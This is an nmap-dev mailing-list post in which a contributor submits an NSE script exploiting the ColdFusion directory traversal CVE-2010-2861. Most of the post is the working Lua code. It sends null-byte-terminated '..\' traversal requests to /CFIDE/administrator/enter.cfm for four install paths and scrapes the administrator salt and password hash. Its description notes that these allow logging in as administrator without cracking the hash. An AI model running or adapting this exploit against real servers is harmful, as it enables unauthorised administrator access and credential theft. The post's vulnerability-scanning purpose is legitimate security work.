CVE-2010-2861 - NSE for ColdFusion locale Directory Traversal Submission

[Micah <micah.hoffman () gmail com>]

First time poster here. I created an NSE for the CVE-2010-2861 ColdFusion
locale dir traversal. It takes an IP and port and will look (if it is
HTTP/HTTPS) for the 4 locations where the password.properties file could
be.  It'll return the salt and password hash both scraped from the response
page.

This is my first NSE attempt and I'm sure that the code can be optimized,
but it does work. There was 1 more step I wanted to take with this but
could not: to use this information you need to get the SHA1 HMAC by using
the salt (retrieved from the page) and the hash (also in the page). It is
this HMAC that authenticates you to the server. I couldn't find a way to
get this.

Wanted to submit it for inclusion in nmap's scripts but couldn't find a
submission form or anything. Hoping that posting it here gets it closer to
being included.

--- Micah



------------------------------------------------------

http-coldfusion-dir-traversal.nse

description = [[
This script will execute a directory traversal attack against a ColdFusion
server
and try to grab the password hash for the administrator user. Using this
information
and a little web proxying, you can log into the ColdFusion server as the
administrator
without cracking the password hash.

For more information on this vulnerability see:
* http://www.blackhatacademy.org/security101/Cold_Fusion_Hacking
* http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2861
]]

---
-- @usage
-- nmap --script http-coldfusion-dir-traversal -p80,443 <target>
--
-- @output
-- 80/tcp open  http
-- | http-coldfusion-dir-traversal:
-- |    CFusionMX   -> SUCCESS - Salt: 1111111111111, Hash:
AB3717200CD629BE34926297D9A0E87C7B0E7761
-- |    CFusionMX7  -> SUCCESS - Salt: 2222222222222, Hash:
0976A887B98C87E545D3A56F8F87D88E8E0A0980
-- |    ColdFusion8 -> SUCCESS - Salt: 3333333333333, Hash:
A43A778B89C09D09E0F776A897F0976534356500
-- |_   JRun4\servers -> SUCCESS - alt: 44444444444444 Hash:
0976A887B98C87E545D3A56F8F87D88E8E0A0980

author = "Micah Hoffman"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html";

categories = {"intrusive", "safe"}

require("http")
require("shortport")
require("stdnse")

portrule = shortport.http

action = function(host, port)

local finalout = ""
local cf6 = ""
 local cf7 = ""
local cf8 = ""
local cfall = ""

-- Function to do the look up and return content
local grabAndGrep = function(page)
 local saltcontent = ""
local hashcontent = ""
 -- Do the HTTP GET request for the page
local response = http.get(host, port, page)
 -- Check to see if we get a good page returned
-- Is there no response?
 if not response.status then
return "No response"
end

-- Is the response not an HTTP 200 code?
if response.status ~= 200 then
 return "HTTP response code not 200"
end
 -- Now check the body for our strings
if response.body then
 saltcontent = response.body:match("salt.*value=\"(%d+)")
hashcontent =
response.body:match("password=([A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9]+)")
 -- If a page has both the salt and the password in it then your exploit
has been successful
 if saltcontent and hashcontent then
 return string.format("SUCCESS - Salt: %s, Hash: %s", saltcontent,
hashcontent)
 else
 return "Not vuln"
 end
end
 end
 --ColdFusion 6 Location

cf6=grabAndGrep('/CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX\\lib\\password.properties\%00en')
 --ColdFusion 7 Location
cf7=grabAndGrep('/CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX7\\lib\\password.properties\%00en')

--ColdFusion 8 Location
cf8=grabAndGrep('/CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion8\\lib\\password.properties\%00en')
 --All ColdFusion Versions
cfall=grabAndGrep('/CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\JRun4\\servers\\cfusion\\cfusion-ear\\cfusion-war\\WEB-INF\\cfusion\\lib\\password.properties\%00en')
  final_out = "\n   CFusionMX   -> " .. cf6 .. "\n   CFusionMX7  -> " ..
cf7 .. "\n   ColdFusion8 -> " .. cf8 .. "\n   JRun4\\servers -> " .. cfall

return final_out
end
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/